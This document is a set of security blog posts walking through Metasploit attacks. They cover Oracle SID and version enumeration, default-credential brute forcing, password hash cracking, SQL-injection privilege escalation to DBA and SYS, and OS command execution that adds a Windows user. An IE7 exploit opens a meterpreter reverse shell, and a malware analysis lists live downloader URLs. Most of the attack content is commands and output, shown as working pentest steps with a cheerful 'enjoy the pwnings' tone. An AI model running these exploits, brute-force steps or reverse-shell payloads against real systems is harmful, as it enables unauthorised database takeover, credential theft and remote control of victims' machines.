Oracle Sid Enumeration Metasploit Auxiliary Module

I recently pushed out (again with MC's) help an Oracle Sid enumeration MSF auxiliary module for Oracle versions less than Oracle 10g Release 2. Starting with 10g Release 2 the TNS listener is protected and wont just cough up the SID for free, you'll have to guess it or brute force it (hopefully the SID guess module will come soon).

Here it is in action

msf > use auxiliary/admin/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port

Description:
This module simply queries the TNS listner for the Oracle SID. With
10g Release 2 and above the listener will be protected and the SID
will have to be bruteforced or guessed.

msf auxiliary(oracle_sid) > set RHOST 192.168.0.43
RHOST => 192.168.0.43
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.0.43: admin1
[*] Identified SID for 192.168.0.43: admin2
[*] Identified SID for 192.168.0.43: database
[*] Identified SID for 192.168.0.43: dba3
[*] Identified SID for 192.168.0.43: dba5
[*] Identified SID for 192.168.0.43: dba7
[*] Identified SERVICE_NAME for 192.168.0.43: admin1
[*] Identified SERVICE_NAME for 192.168.0.43: admin2
[*] Identified SERVICE_NAME for 192.168.0.43: database
[*] Identified SERVICE_NAME for 192.168.0.43: dba3
[*] Identified SERVICE_NAME for 192.168.0.43: dba5
[*] Identified SERVICE_NAME for 192.168.0.43: dba7
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

If its protected you'll see this:

msf auxiliary(oracle_sid) > set RHOST 192.168.0.137
RHOST => 192.168.0.137
msf auxiliary(oracle_sid) > run

[-] TNS listener protected for 192.168.0.137...
[*] Auxiliary module execution completed

If you are on the MSF 3.3 trunk a svn update should be all you need to do.

More Oracle Pwnage...I Lost Count...New Version Module

Thanks to help from MC, I pushed out a oracle_version scanner module today for MSF that uses MC's TNS mixin.

here it is in action:

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build..

msf auxiliary(oracle_version) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(oracle_version) > run

[-] The connection timed out (192.168.0.0:1521).
[-] The connection timed out (192.168.0.1:1521).
[-] The connection timed out (192.168.0.2:1521).
[-] The connection timed out (192.168.0.3:1521).
[-] The connection timed out (192.168.0.4:1521).
[-] The connection timed out (192.168.0.5:1521).
[-] The connection timed out (192.168.0.6:1521).
[-] The connection timed out (192.168.0.7:1521).
[-] The connection was refused by the remote host (192.168.0.8:1521).
[-] The connection timed out (192.168.0.9:1521).
[-] The connection timed out (192.168.0.10:1521).
[-] The connection was refused by the remote host (192.168.0.11:1521).
[*] Host 192.168.0.12 is running: 32-bit Windows: Version 10.2.0.1.0 - Production
[-] The connection timed out (192.168.0.13:1521).
[*] Host 192.168.0.14 is running: Linux: Version 10.2.0.1.0 - Production
[-] The connection timed out (192.168.0.15:1521).
[-] The connection timed out (192.168.0.16:1521).
---SNIP---You get the idea---

If you are running the framework trunk, you can svn up and get the aux module as well as MC's 8i TNS overflow exploit.

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Oracle Pwnage Part 3

Sorry no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some oracle hashes after some crafty (well not realy) sql queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5

Oracle Pwnage with the Metasploit Oracle Modules Part 2

Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/
use auxiliary/sqli/oracle/ctxsys_driload
use auxiliary/sqli/oracle/dbms_export_extension
use auxiliary/sqli/oracle/dbms_metadata
use auxiliary/sqli/oracle/lt_findricset
use auxiliary/sqli/oracle/pitrig_truncate
msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info

Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBA SCOTT no DB user to elevate to DBA.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > **Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...
[*] Auxiliary module execution completed

Let's check to see if it worked

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO <-- Yup it worked :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- ------------- -------- -----------
CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(oracle_win32) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'
[*] Done...
[*] Auxiliary module execution completed

or you can test you are executing commands with ping

msf auxiliary(oracle_win32) > set CMD "ping 192.168.100.50"
CMD => ping 192.168.100.50
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'ping 192.168.100.50'
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_win32) >

on the other end, run tcpdump and filter for ICMP.

sudo tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40
01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40
---SNIP---

8 packets captured
8 packets received by filter
0 packets dropped by kernel

For the ninja shit, check out MC's demo text file.

**Issues, you cant see the output of your command, so you have to run stuff that you can see the results of, see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module

"revoke dba from scott"
"revoke javaprivs from scott"

That's it!

Oracle Pwnage with the Metasploit Oracle Modules Part 1

Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here: http://metasploit.com/users/mc/

We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run

[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 - Production

Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.


msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed

WTF! no FTW on that one. A Google of the error oracle 12514, hints at the Oracle instance not being set up correctly. Lets see if we can get some more info. Using tnscmd.pl (oldie but a goodie) lets see if we get some additional information using the status command:

cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,.........@


Let's try it with the service name; UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
[*] PL/SQL Release 9.2.0.1.0 - Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
[*] NLSRTL Version 9.2.0.1.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

**Yeah it worked. Now its time to get some more useful info

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed

Thats it for part 1, part 2 we'll use some sqli to hopefully bump scott up to DBA and execute some OS commands.

Link: Writing malicious maros using metasploit

Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

http://blogs.securiteam.com/index.php/archives/1161

of course those attacks can be mitigated with proper group policy but most places "need their macros!" so enjoy the pwnings.

From Virus Alert to Pwnage Part 2

Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".



AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 7.8.1.34 2008.10.14 -
Authentium 5.1.0.4 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 8.0.0.161 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 4.44.0.09170 2008.10.15 -
eSafe 7.0.17.0 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 4.4.4.56 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
Fortinet 3.113.0.0 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3.1.1.34.0 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 7.0.0.125 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 9.0.0.4 2008.10.14 Suspicious file
PCTools 4.4.2.0 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 20.66.12.00 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 6.3.1.0.112 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 3.12.8.6 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 4.5.11.0 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a
308729d606a409ef8484edf9bf4b4a1310db8cba61b941b380f6d2ee09e3c694
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
http://info.prevx.com/aboutprogramtext.asp?PX5=54E3AAE0008B14250A3900BD90B69
A00B79BCD14
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX


Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
DLL-Handling
Loaded DLLs
C:\WINDOWS\system32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\Secur32.dll
C:\WINDOWS\system32\user32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\msvcrt.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\IMM32.DLL
C:\WINDOWS\system32\pstorec.dll
C:\WINDOWS\system32\ATL.DLL
Registry
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe

http://94.75.221.68/stuff/border8.gif) As User: () Creation Flags: ()

--------

Found a norton report based on the IP

https://safeweb.norton.com/report/show?url=94.75.221.68&x=0&y=0

Severity: High

3 instances found. Here is a sample:

Downloader
Location: http://94.75.221.68/stuff/border10.gif
Downloader
Location: http://94.75.221.68/stuff/border8.gif
Downloader
Location: http://94.75.221.68/stuff/border9.gif

----------
**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 94.75.221.68
Connection: Keep-Alive

